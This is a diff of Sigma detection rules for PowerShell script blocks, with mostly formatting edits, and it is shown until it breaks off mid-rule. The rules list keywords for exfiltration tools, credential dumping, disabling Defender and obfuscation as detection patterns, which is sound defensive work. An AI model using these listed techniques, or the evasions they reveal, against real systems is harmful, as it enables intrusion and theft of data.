Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps @@ -32,11 +28,13 @@ detection: - -Online - -FeatureName selection_feature: + # Add any important windows features ScriptBlockText|contains: - Windows-Defender-Gui - Windows-Defender-Features - Windows-Defender - Windows-Defender-ApplicationGuard + # - 'Containers-DisposableClientVM' # Windows Sandbox condition: ps_script and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml index d6283f481..30b1a3760 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml @@ -24,6 +24,6 @@ detection: ScriptBlockText|contains: Start-Dnscat2 condition: ps_script and selection falsepositives: - - "Legitimate usage of PowerShell Dnscat2 \u2014 DNS Exfiltration tool (unlikely)" + - Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely) level: critical ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml b/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml index b2dc180da..70eb3e3f5 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml @@ -1,8 +1,7 @@ title: Potential In-Memory Execution Using Reflection.Assembly id: ddcd88cb-7f62-4ce5-86f9-1704190feb0a status: test -description: Detects usage of "Reflection.Assembly" load functions to dynamically - load assemblies in memory +description: Detects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50 author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml b/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml index 3fa0e632b..289984ab2 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml @@ -1,11 +1,10 @@ title: Potential COM Objects Download Cradles Usage - PS Script id: 3c7d1587-3b13-439f-9941-7d14313dbdfe related: - - id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf - type: similar + - id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf + type: similar status: test -description: Detects usage of COM objects that can be abused to download files in - PowerShell by CLSID +description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID references: - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml b/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml index da6b3aac6..d7ef3ef15 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml @@ -1,13 +1,9 @@ title: Dump Credentials from Windows Credential Manager With PowerShell id: 99c49d9c-34ea-45f7-84a7-4751ae6b2cbc status: test -description: 'Adversaries may search for common password storage locations to obtain - user credentials. - - Passwords are stored in several places on a system, depending on the operating - system or application holding the credentials. - - ' +description: | + Adversaries may search for common password storage locations to obtain user credentials. + Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml b/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml index 40dfb9fb4..bc08260bf 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml @@ -1,9 +1,7 @@ title: Enable Windows Remote Management id: 991a9744-f2f0-44f2-bd33-9092eba17dc3 status: test -description: Adversaries may use Valid Accounts to interact with remote systems using - Windows Remote Management (WinRM). The adversary may then perform actions as the - logged-on user. +description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml b/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml index 94bda0a02..dd5260920 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml @@ -1,16 +1,12 @@ title: Potential Suspicious Windows Feature Enabled id: 55c925c1-7195-426b-a136-a9396800e29b related: - - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918 - type: similar + - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918 + type: similar status: test -description: 'Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" - used as a Deployment Image Servicing and Management tool. - - Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, - and update features and packages in Windows images - - ' +description: | + Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system @@ -36,6 +32,7 @@ detection: - -Online - -FeatureName selection_feature: + # Add any insecure/unusual windows features to your env ScriptBlockText|contains: - TelnetServer - Internet-Explorer-Optional-amd64 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml b/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml index d3ad5e426..e5cda5e53 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml @@ -1,13 +1,9 @@ title: Enumerate Credentials from Windows Credential Manager With PowerShell id: 603c6630-5225-49c1-8047-26c964553e0e status: test -description: 'Adversaries may search for common password storage locations to obtain - user credentials. - - Passwords are stored in several places on a system, depending on the operating - system or application holding the credentials. - - ' +description: | + Adversaries may search for common password storage locations to obtain user credentials. + Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml b/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml index 3a416f3ce..0f8aefa52 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml @@ -1,8 +1,8 @@ title: Disable of ETW Trace - Powershell id: 115fdba9-f017-42e6-84cf-d5573bf2ddf8 related: - - id: a238b5d0-ce2d-4414-a676-7a531b3d13d6 - type: derived + - id: a238b5d0-ce2d-4414-a676-7a531b3d13d6 + type: derived status: test description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions references: @@ -25,9 +25,9 @@ detection: Channel: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational - selection_pwsh_remove: + selection_pwsh_remove: # Autologger provider removal ScriptBlockText|contains: 'Remove-EtwTraceProvider ' - selection_pwsh_set: + selection_pwsh_set: # Provider “Enable” property modification ScriptBlockText|contains|all: - 'Set-EtwTraceProvider ' - '0x11' diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml b/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml index 76fd0d56c..f73e2fb1f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml @@ -1,8 +1,7 @@ title: Suspicious PowerShell Mailbox SMTP Forward Rule id: 15b7abbb-8b40-4d01-9ee2-b51994b1d474 status: test -description: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP - forwarding rule. +description: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule. references: - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml b/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml index ec4e7ec10..cd9b9de8f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_export_certificate.yml @@ -1,12 +1,10 @@ title: Certificate Exported Via PowerShell - ScriptBlock id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c related: - - id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb - type: similar + - id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb + type: similar status: test -description: Detects calls to cmdlets inside of PowerShell scripts that are used to - export certificates from the local certificate store. Threat actors were seen - abusing this to steal private keys from compromised machines. +description: Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate @@ -35,7 +33,6 @@ detection: ScriptBlockText|contains: CmdletsToExport = @( condition: ps_script and (selection and not 1 of filter_optional_*) falsepositives: - - Legitimate certificate exports by administrators. Additional filters might be - required. + - Legitimate certificate exports by administrators. Additional filters might be required. level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml b/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml index 19eb9ac58..c52871bf0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml @@ -1,12 +1,10 @@ title: Suspicious FromBase64String Usage On Gzip Archive - Ps Script id: df69cb1d-b891-4cd9-90c7-d617d90100ce related: - - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f - type: similar + - id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f + type: similar status: test -description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. - This technique is often used as a method to load malicious content into memory - afterward. +description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml index 908a7f5fb..b03f19181 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml @@ -1,16 +1,10 @@ title: Service Registry Permissions Weakness Check id: 95afc12e-3cbb-40c3-9340-84a032e596a3 status: test -description: 'Adversaries may execute their own malicious payloads by hijacking the - Registry entries used by services. - - Adversaries may use flaws in the permissions for registry to redirect from the - originally specified executable to one that they control, in order to launch their - own code at Service start. - +description: | + Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. + Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml index 9a3c9649f..160cc699c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml @@ -1,8 +1,7 @@ title: Active Directory Computers Enumeration With Get-AdComputer id: 36bed6b2-e9a0-4fff-beeb-413a92b86138 status: experimental -description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties - within Active Directory. +description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory. references: - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml index 627067cb9..e826056b7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml @@ -1,8 +1,7 @@ title: Active Directory Group Enumeration With Get-AdGroup id: 8c3a6607-b7dc-4f0d-a646-ef38c00b76ee status: test -description: Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within - Active Directory +description: Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml index 4de38be7b..0afcd428f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml @@ -1,13 +1,9 @@ title: Suspicious Get-ADReplAccount id: 060c3ef1-fd0a-4091-bf46-e7d625f60b73 status: test -description: 'The DSInternals PowerShell Module exposes several internal features - of Active Directory and Azure Active Directory. - - These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, - password auditing, DC recovery from IFM backups and password hash calculation. - - ' +description: | + The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. + These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. references: - https://www.powershellgallery.com/packages/DSInternals - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml index bb9795098..bfa95e508 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml @@ -1,16 +1,10 @@ title: Automated Collection Bookmarks Using Get-ChildItem PowerShell id: e0565f5d-d420-4e02-8a68-ac00d864f9cf status: test -description: 'Adversaries may enumerate browser bookmarks to learn more about compromised - hosts. - - Browser bookmarks may reveal personal information about users (ex: banking sites, - interests, social media, etc.) as well as details about - - internal network resources such as servers, tools/dashboards, or other related - infrastructure. - - ' +description: | + Adversaries may enumerate browser bookmarks to learn more about compromised hosts. + Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about + internal network resources such as servers, tools/dashboards, or other related infrastructure. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml b/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml index 094746792..5d645f4c3 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml @@ -1,14 +1,9 @@ title: Security Software Discovery Via Powershell Script id: 904e8e61-8edf-4350-b59c-b905fc8e810c status: experimental -description: 'Detects calls to "get-process" where the output is piped to a "where-object" - filter to search for security solution processes. - - Adversaries may attempt to get a listing of security software, configurations, - defensive tools, and sensors that are installed on a system or in a cloud environment. - This may include things such as firewall rules and anti-virus - - ' +description: | + Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. + Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell author: frack113, Anish Bogati, Nasreddine Bencherchali (Nextron Systems) @@ -42,6 +37,8 @@ detection: - Product -like selection_keywords: ScriptBlockText|contains: + # Note: These strings are using wildcard assuming the search is using the "-like" operator. + # You can add specific variant with the actual process names to increase coverage - \*avira\* - \*carbonblack\* - \*cylance\* @@ -53,10 +50,7 @@ detection: - \*virus\* condition: ps_script and (all of selection_*) falsepositives: - - False positives might occur due to the nature of the ScriptBlock being ingested - as a big blob. Initial tuning is required. - - As the "selection_cmdlet" is common in scripts the matching engine might slow - down the search. Change into regex or a more accurate string to avoid heavy - resource consumption if experienced + - False positives might occur due to the nature of the ScriptBlock being ingested as a big blob. Initial tuning is required. + - As the "selection_cmdlet" is common in scripts the matching engine might slow down the search. Change into regex or a more accurate string to avoid heavy resource consumption if experienced level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml index b8fde9228..c38a2cd99 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml @@ -1,11 +1,10 @@ title: HackTool - Rubeus Execution - ScriptBlock id: 3245cd30-e015-40ff-a31d-5cadd5f377ec related: - - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 - type: similar + - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 + type: similar status: experimental -description: Detects the execution of the hacktool Rubeus using specific command line - flags +description: Detects the execution of the hacktool Rubeus using specific command line flags references: - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml index d5a5d52da..ae08a7b09 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml @@ -1,13 +1,11 @@ title: HackTool - WinPwn Execution - ScriptBlock id: 851fd622-b675-4d26-b803-14bc7baa517a related: - - id: d557dc06-62e8-4468-a8e8-7984124908ce - type: similar + - id: d557dc06-62e8-4468-a8e8-7984124908ce + type: similar status: experimental -description: 'Detects scriptblock text keywords indicative of potential usge of the - tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - - ' +description: | + Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. author: Swachchhanda Shrawan Poudel date: 2023/12/04 references: @@ -48,7 +46,6 @@ detection: - WinPwn.ps1 condition: ps_script and selection falsepositives: - - As the script block is a blob of text. False positive may occur with scripts - that contain the keyword as a reference or simply use it for detection. + - As the script block is a blob of text. False positive may occur with scripts that contain the keyword as a reference or simply use it for detection. level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml b/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml index e7ca18bf0..c5ec421cb 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml @@ -1,8 +1,7 @@ title: PowerShell Hotfix Enumeration id: f5d1def8-1de0-4a0e-9794-1f6f27dd605c status: test -description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed - hotfixes often used in "enum" scripts by attackers +description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers references: - https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml b/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml index 77ae18252..e67d04197 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml @@ -1,9 +1,7 @@ title: PowerShell ICMP Exfiltration id: 4c4af3cd-2115-479c-8193-6b8bfce9001c status: test -description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may - steal data by exfiltrating it over an un-encrypted network protocol other than - that of the existing command and control channel. +description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp author: Bartlomiej Czyz @bczyz1, oscd.community diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml b/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml index d3e315084..071d645c9 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml @@ -1,8 +1,8 @@ title: Import PowerShell Modules From Suspicious Directories id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab related: - - id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 - type: similar + - id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 + type: similar status: test description: Detects powershell scripts that import modules from suspicious directories references: @@ -32,6 +32,7 @@ detection: - Import-Module '$Env:Appdata\ - Import-Module $Env:Appdata\ - Import-Module C:\Users\Public\ + # Import-Module alias is "ipmo" - ipmo "$Env:Temp\ - ipmo '$Env:Temp\ - ipmo $Env:Temp\ diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml b/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml index f8523c59d..634140a25 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml @@ -1,11 +1,10 @@ title: Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript id: 975b2262-9a49-439d-92a6-0709cccdf0b2 related: - - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a - type: similar + - id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a + type: similar status: test -description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" - to install unsigned AppX packages +description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages references: - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package - https://twitter.com/WindowsDocs/status/1620078135080325122 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml index d675ad246..da0fd1246 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml @@ -1,9 +1,7 @@ title: Execute Invoke-command on Remote Host id: 7b836d7f-179c-4ba4-90a7-a7e60afb48e6 status: test -description: Adversaries may use Valid Accounts to interact with remote systems using - Windows Remote Management (WinRM). The adversary may then perform actions as the - logged-on user. +description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml index 5453dddc7..822ff5c7d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml @@ -1,8 +1,7 @@ title: Powershell DNSExfiltration id: d59d7842-9a21-4bc6-ba98-64bfe0091355 status: test -description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS - request covert channel +description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh - https://github.com/Arno0x/DNSExfiltrator @@ -22,13 +21,13 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_cmdlet: - - ScriptBlockText|contains: Invoke-DNSExfiltrator - - ScriptBlockText|contains|all: - - ' -i ' - - ' -d ' - - ' -p ' - - ' -doh ' - - ' -t ' + - ScriptBlockText|contains: Invoke-DNSExfiltrator + - ScriptBlockText|contains|all: + - ' -i ' + - ' -d ' + - ' -p ' + - ' -doh ' + - ' -t ' condition: ps_script and selection_cmdlet falsepositives: - Legitimate script diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml index 171b01cf7..fc78b81b7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml @@ -3,7 +3,7 @@ id: 73e67340-0d25-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml index 40480a8d5..4ee15c62b 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml @@ -1,8 +1,7 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the following code block \u2014 +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -24,12 +23,12 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_iex: - - ScriptBlockText|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - ScriptBlockText|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - ScriptBlockText|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - ScriptBlockText|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - ScriptBlockText|re: \*mdr\*\W\s*\)\.Name - - ScriptBlockText|re: \$VerbosePreference\.ToString\( + - ScriptBlockText|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - ScriptBlockText|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - ScriptBlockText|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - ScriptBlockText|re: 